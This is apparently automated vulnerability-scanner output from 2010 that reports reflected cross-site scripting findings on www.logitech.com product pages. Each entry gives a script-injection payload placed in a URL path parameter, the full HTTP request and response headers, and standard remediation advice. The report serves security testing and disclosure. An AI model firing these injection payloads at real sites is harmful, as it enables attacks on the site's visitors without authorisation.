GET /en-us/mice-pointers/mice86960"><script>alert(1)</script>fb364dca366/devices/7247 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78b56</script><script>alert(1)</script>622861563b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice78b56</script><script>alert(1)</script>622861563b0/devices/7247 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7fc6</script><script>alert(1)</script>000d36eace was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devicese7fc6</script><script>alert(1)</script>000d36eace/7247 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ff08"><script>alert(1)</script>de22eec0a0a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devices8ff08"><script>alert(1)</script>de22eec0a0a/7247 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeb6f"><script>alert(1)</script>70b9b878e74 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devices/7247aeb6f"><script>alert(1)</script>70b9b878e74 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b279</script><script>alert(1)</script>f6635d9a59e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devices/72474b279</script><script>alert(1)</script>f6635d9a59e HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8292f"><script>alert(1)</script>d51d01dee58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us8292f"><script>alert(1)</script>d51d01dee58/mice-pointers/mice/devices/7254 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80701"%3bb416d8269d1 was submitted in the REST URL parameter 1. This input was echoed as 80701";b416d8269d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us80701"%3bb416d8269d1/mice-pointers/mice/devices/7254 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43404</script><script>alert(1)</script>15dabf00b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /43404</script><script>alert(1)</script>15dabf00b7a/mice-pointers/mice/devices/7254 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 605ae</script><script>alert(1)</script>8f8e63958f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers605ae</script><script>alert(1)</script>8f8e63958f4/mice/devices/7254 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e087"><script>alert(1)</script>42e9419ef46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers9e087"><script>alert(1)</script>42e9419ef46/mice/devices/7254 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9aa23</script><script>alert(1)</script>f91bf9245d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice9aa23</script><script>alert(1)</script>f91bf9245d3/devices/7254 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59ff"><script>alert(1)</script>5dc501faa2c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/micef59ff"><script>alert(1)</script>5dc501faa2c/devices/7254 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7857e</script><script>alert(1)</script>3d60e48c94f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devices7857e</script><script>alert(1)</script>3d60e48c94f/7254 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a620b"><script>alert(1)</script>6c3238e7caa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devicesa620b"><script>alert(1)</script>6c3238e7caa/7254 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fdc5"><script>alert(1)</script>0c63503e02a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devices/72544fdc5"><script>alert(1)</script>0c63503e02a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5cd7</script><script>alert(1)</script>302b80a8c51 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devices/7254f5cd7</script><script>alert(1)</script>302b80a8c51 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:58:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2104c"><script>alert(1)</script>37bdfd49681 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us2104c"><script>alert(1)</script>37bdfd49681/mice-pointers/mice/devices/7255 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64208"%3be412e4fb0d5 was submitted in the REST URL parameter 1. This input was echoed as 64208";e412e4fb0d5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us64208"%3be412e4fb0d5/mice-pointers/mice/devices/7255 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84b54</script><script>alert(1)</script>7f5d694de96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /84b54</script><script>alert(1)</script>7f5d694de96/mice-pointers/mice/devices/7255 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2408</script><script>alert(1)</script>165535c9825 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointersf2408</script><script>alert(1)</script>165535c9825/mice/devices/7255 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29d58"><script>alert(1)</script>0ab9f907d61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers29d58"><script>alert(1)</script>0ab9f907d61/mice/devices/7255 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d263d"><script>alert(1)</script>fef07a96b7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/miced263d"><script>alert(1)</script>fef07a96b7b/devices/7255 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8b02</script><script>alert(1)</script>c36f9fa9404 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/micee8b02</script><script>alert(1)</script>c36f9fa9404/devices/7255 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload decfd</script><script>alert(1)</script>b9345f75583 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devicesdecfd</script><script>alert(1)</script>b9345f75583/7255 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f7b1"><script>alert(1)</script>4abb704f59b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devices4f7b1"><script>alert(1)</script>4abb704f59b/7255 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 385dd"><script>alert(1)</script>0d34ed7c792 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devices/7255385dd"><script>alert(1)</script>0d34ed7c792 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19849</script><script>alert(1)</script>ad48f44e6e4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devices/725519849</script><script>alert(1)</script>ad48f44e6e4 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:58:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a723f"><script>alert(1)</script>383348107df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usa723f"><script>alert(1)</script>383348107df/mice-pointers/mice/devices/7275 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:57 GMT Connection: close
